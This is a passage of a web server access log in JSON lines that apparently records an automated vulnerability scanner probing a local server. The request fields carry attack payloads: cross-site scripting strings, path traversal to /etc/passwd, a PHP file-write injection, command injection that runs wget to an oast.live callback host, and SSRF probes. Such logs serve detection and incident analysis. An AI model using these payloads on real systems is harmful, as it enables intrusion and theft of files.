+0000","request_body":"referer=%2Fthruk&login=--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=Thruk+Monitoring+Webinterface","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /thruk/cgi-bin/login.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.441","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"127.0.0.1/thruk/cgi-bin/login.cgi?thruk", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.301","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.redmine-cli HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.308","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%c0 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.396","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dev/tests/functional/etc/config.xml.dist HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.172","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"action=&token=`wget http://c9oms3gsmpve1ijt0mc0qit1d7f5e9b97.oast.live`&mode=`wget http://c9oms3gsmpve1ijt0mc0gt48gwkbt53zx.oast.live`","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /storfs-asup HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.426","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///etc.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.427","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/pods HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.337","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.282","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.292","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /settings.php.save HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.302","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.314","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.284","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /plus/carbuyaction.php?dopost=return&code=../../ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.361","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.360","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.368","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.357","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.305","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.330","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.372","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dashboard/auth/login/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.400","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.278","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///etc.1.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.316","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /1.sql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.348","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%5C../ssl/yaws-key.pem HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.665","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /settings.php.swp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.360","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@WillBeReplaced.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.376","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.819","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:20 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /darkstat/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.264","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /web/index.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.336","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"getpwd=WorldFilledWithLove","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.344","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jquery-file-upload/server/php/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.374","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///etc....4.2.1....json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.261","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ovirt-engine/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.281","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%2228fHqKSUULeoGiLuVf2QixgEfYL.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.119","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp?user=j%22;-alert(1)-%22x HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.425","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.139","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /secure/ViewUserHover.jspa HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /getFavicon?host=http://c9oms3gsmpve1ijt0mc0wstyr7mzj6az8.oast.live HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.382","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sysmgmt/2015/bmc/info HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.725","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.276","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /backup.sql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.363","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\x5C0 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.384","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webapi/v1/system/accountmanage/account HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.270","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.786","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /xmlrpc.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.298","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.387","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https://;@example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.414","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /settings.php.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.432","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///etc.json?FNZ.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.280","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.278","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /msa/../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /28fHqKSUULeoGiLuVf2QixgEfYL.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.335","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.389","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/71 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.144","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /system/console?.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.296","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /interlib/report/ShowImage?localPath=etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.309","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /v1/agent/self HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.299","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.300","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.295","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) 